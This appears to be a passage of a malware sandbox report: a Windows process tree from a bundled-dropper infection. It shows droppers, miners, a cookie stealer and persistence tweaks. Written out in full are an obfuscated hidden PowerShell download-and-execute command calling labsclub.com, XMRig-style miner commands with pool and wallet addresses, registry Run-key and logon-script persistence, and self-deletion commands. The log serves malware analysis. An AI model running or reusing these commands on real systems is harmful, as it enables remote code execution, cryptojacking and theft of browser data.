C:\Users\Admin\AppData\Local\Temp\is-3DBKH.tmp\kuwhjmelpjl.tmp"C:\Users\Admin\AppData\Local\Temp\is-3DBKH.tmp\kuwhjmelpjl.tmp" /SL5="$8019C,2592217,780800,C:\Users\Admin\AppData\Local\Temp\bdi5f0b1mly\kuwhjmelpjl.exe" /VERYSILENT9⤵PID:5424
-
C:\Users\Admin\AppData\Local\Temp\is-3CA99.tmp\winlthsth.exe"C:\Users\Admin\AppData\Local\Temp\is-3CA99.tmp\winlthsth.exe"10⤵PID:2744
-
C:\Users\Admin\AppData\Local\Temp\HNbfw3a03.exe"C:\Users\Admin\AppData\Local\Temp\HNbfw3a03.exe"11⤵PID:4840
-
C:\Users\Admin\AppData\Local\Temp\HNbfw3a03.exe"C:\Users\Admin\AppData\Local\Temp\HNbfw3a03.exe"12⤵PID:6220
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"11⤵PID:2748
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"12⤵PID:7848
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\atdgsio1add\vict.exe"C:\Users\Admin\AppData\Local\Temp\atdgsio1add\vict.exe" /VERYSILENT /id=5358⤵PID:5452
-
C:\Users\Admin\AppData\Local\Temp\is-42C0N.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-42C0N.tmp\vict.tmp" /SL5="$10382,870426,780800,C:\Users\Admin\AppData\Local\Temp\atdgsio1add\vict.exe" /VERYSILENT /id=5359⤵PID:5564
-
C:\Users\Admin\AppData\Local\Temp\is-UIO9I.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-UIO9I.tmp\win1host.exe" 53510⤵PID:5836
-
C:\Users\Admin\AppData\Local\Temp\aTbPsDelc.exe"C:\Users\Admin\AppData\Local\Temp\aTbPsDelc.exe"11⤵PID:4640
-
C:\Users\Admin\AppData\Local\Temp\aTbPsDelc.exe"C:\Users\Admin\AppData\Local\Temp\aTbPsDelc.exe"12⤵PID:6068
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5836 -s 57211⤵
- Program crash
PID:7368
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\png35gun1c5\kzfg44emh24.exe"C:\Users\Admin\AppData\Local\Temp\png35gun1c5\kzfg44emh24.exe" /ustwo INSTALL8⤵PID:5624
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "kzfg44emh24.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\png35gun1c5\kzfg44emh24.exe" & exit9⤵PID:2092
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "kzfg44emh24.exe" /f10⤵
- Kills process with taskkill
PID:5640
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\hfmmgkp0xqc\icpwvr1wahw.exe"C:\Users\Admin\AppData\Local\Temp\hfmmgkp0xqc\icpwvr1wahw.exe"8⤵PID:5744
-
-
C:\Users\Admin\AppData\Local\Temp\kcy03tkpcpz\app.exe"C:\Users\Admin\AppData\Local\Temp\kcy03tkpcpz\app.exe" /8-238⤵PID:5852
-
C:\Users\Admin\AppData\Local\Temp\kcy03tkpcpz\app.exe"C:\Users\Admin\AppData\Local\Temp\kcy03tkpcpz\app.exe" /8-239⤵PID:5260
-
-
-
C:\Users\Admin\AppData\Local\Temp\wiyr0qzwrnh\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\wiyr0qzwrnh\cpyrix.exe" /VERYSILENT8⤵PID:5928
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe9⤵PID:5584
-
C:\Windows\SysWOW64\at.exe"C:\Windows\System32\at.exe"10⤵PID:5440
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Tre.pub10⤵PID:5960
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe11⤵PID:2088
-
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe9⤵PID:5428
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"10⤵PID:6964
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\g3unl1todqj\IBInstaller_97039.exe"C:\Users\Admin\AppData\Local\Temp\g3unl1todqj\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq8⤵PID:6028
-
C:\Users\Admin\AppData\Local\Temp\is-S44OT.tmp\IBInstaller_97039.tmp"C:\Users\Admin\AppData\Local\Temp\is-S44OT.tmp\IBInstaller_97039.tmp" /SL5="$1043C,14574917,721408,C:\Users\Admin\AppData\Local\Temp\g3unl1todqj\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq9⤵PID:1728
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-FJSDJ.tmp\{app}\microsoft.cab -F:* %ProgramData%10⤵PID:5516
-
C:\Windows\SysWOW64\expand.exeexpand C:\Users\Admin\AppData\Local\Temp\is-FJSDJ.tmp\{app}\microsoft.cab -F:* C:\ProgramData11⤵PID:3108
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://egypthistoricart.online/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039^¶m=10⤵PID:5616
-
-
C:\ProgramData\regid.1993-06.com.microsoft\client32.exe"C:\ProgramData\regid.1993-06.com.microsoft\client32.exe"10⤵PID:6168
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\client32.exe" /f10⤵PID:6164
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\e5ddr5ducdo\ararutrvbnj.exe"C:\Users\Admin\AppData\Local\Temp\e5ddr5ducdo\ararutrvbnj.exe" /quiet SILENT=1 AF=7568⤵PID:6048
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=756 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\e5ddr5ducdo\ararutrvbnj.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\e5ddr5ducdo\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1617188839 /quiet SILENT=1 AF=756 " AF="756" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912"9⤵PID:5596
-
-
-
C:\Users\Admin\AppData\Local\Temp\rghxbj0z2x5\vpn.exe"C:\Users\Admin\AppData\Local\Temp\rghxbj0z2x5\vpn.exe" /silent /subid=4828⤵PID:6056
-
C:\Users\Admin\AppData\Local\Temp\is-T2I0B.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-T2I0B.tmp\vpn.tmp" /SL5="$1042A,15170975,270336,C:\Users\Admin\AppData\Local\Temp\rghxbj0z2x5\vpn.exe" /silent /subid=4829⤵PID:4472
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "10⤵PID:6596
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap090111⤵PID:7156
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "10⤵PID:5568
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap090111⤵PID:7016
-
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall10⤵PID:988
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install10⤵PID:4792
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\U5I6BFWGIQ\setups.exe"C:\Users\Admin\AppData\Local\Temp\U5I6BFWGIQ\setups.exe" ll5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4676 -
C:\Users\Admin\AppData\Local\Temp\is-6PIRL.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-6PIRL.tmp\setups.tmp" /SL5="$90058,635399,250368,C:\Users\Admin\AppData\Local\Temp\U5I6BFWGIQ\setups.exe" ll6⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:192
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:200 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵
- Suspicious use of WriteProcessMemory
PID:3344 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2112
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full Program Features.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full Program Features.exe"4⤵PID:4468
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"5⤵PID:2412
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install6⤵PID:2216
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"4⤵PID:2732
-
C:\Users\Admin\AppData\Roaming\D3E0.tmp.exe"C:\Users\Admin\AppData\Roaming\D3E0.tmp.exe"5⤵PID:4668
-
C:\Users\Admin\AppData\Roaming\D3E0.tmp.exe"C:\Users\Admin\AppData\Roaming\D3E0.tmp.exe"6⤵PID:4436
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4436 -s 10327⤵
- Program crash
PID:6012
-
-
-
-
C:\Users\Admin\AppData\Roaming\D8B3.tmp.exe"C:\Users\Admin\AppData\Roaming\D8B3.tmp.exe"5⤵PID:4664
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 999996⤵PID:5608
-
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 99996⤵PID:5756
-
-
-
C:\Users\Admin\AppData\Roaming\DB35.tmp.exe"C:\Users\Admin\AppData\Roaming\DB35.tmp.exe"5⤵PID:720
-
C:\Windows\SysWOW64\cmd.exe/c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\DB35.tmp.exe6⤵PID:5040
-
C:\Windows\SysWOW64\timeout.exetimeout /t 37⤵
- Delays execution with timeout.exe
PID:6272
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"5⤵PID:5468
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
PID:5804
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"4⤵PID:5720
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"4⤵PID:7660
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"4⤵PID:7644
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:6716
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:3392
-
-
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2820
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:4736
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:2012
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:4496
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:4288
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:2368
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding E3D925126845DE8D8BA60702329D6427 C2⤵PID:3084
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding F64A7A11636515CBA3F708CA31796CED2⤵PID:4384
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"2⤵PID:8096
-
C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe" -silent=1 -AF=756 -BF=default -uncf=default3⤵PID:7048
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" "--anbfs"4⤵PID:7092
-
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:4760
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\b90e24cadbf54ed1bcdc21cc9cff924a /t 0 /p 47601⤵PID:7524
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:1976
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:8080
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵PID:4876
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{7da5a272-921d-7649-9739-885579d38e59}\oemvista.inf" "9" "4d14a44ff" "0000000000000164" "WinSta0\Default" "0000000000000170" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵PID:8128
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000164"2⤵PID:8100
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:6808
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵PID:5608
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵PID:2588
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:7880
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\6eec1c11a34e4449866ea3f6eabc59fd /t 2820 /p 68081⤵PID:5872
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s seclogon1⤵PID:6184
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵PID:6744
-
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exeMaskVPNUpdate.exe /silent2⤵PID:648
-
-
C:\Users\Admin\AppData\Local\Temp\ECB9.exeC:\Users\Admin\AppData\Local\Temp\ECB9.exe1⤵PID:6944
-
C:\Users\Admin\AppData\Local\Temp\F17C.exeC:\Users\Admin\AppData\Local\Temp\F17C.exe1⤵PID:6396
-
C:\Users\Admin\AppData\Local\Temp\FF97.exeC:\Users\Admin\AppData\Local\Temp\FF97.exe1⤵PID:5380
-
C:\Users\Admin\AppData\Local\Temp\D92.exeC:\Users\Admin\AppData\Local\Temp\D92.exe1⤵PID:1500
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "svrhost" /t REG_SZ /d "C:\Users\Admin\AppData\Local\svrhost.exe"2⤵PID:860
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "svrhost" /t REG_SZ /d "C:\Users\Admin\AppData\Local\svrhost.exe"3⤵PID:7300
-
-
-
C:\Users\Admin\AppData\Local\svrhost.exe"C:\Users\Admin\AppData\Local\svrhost.exe"2⤵PID:4536
-
C:\Users\Admin\AppData\Local\Temp\AddInProcess32.exe"C:\Users\Admin\AppData\Local\Temp\AddInProcess32.exe"3⤵PID:7760
-
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:6072
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:1272
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:7280
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:7108
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:4768
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:7352
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:7756
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:3544
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:5856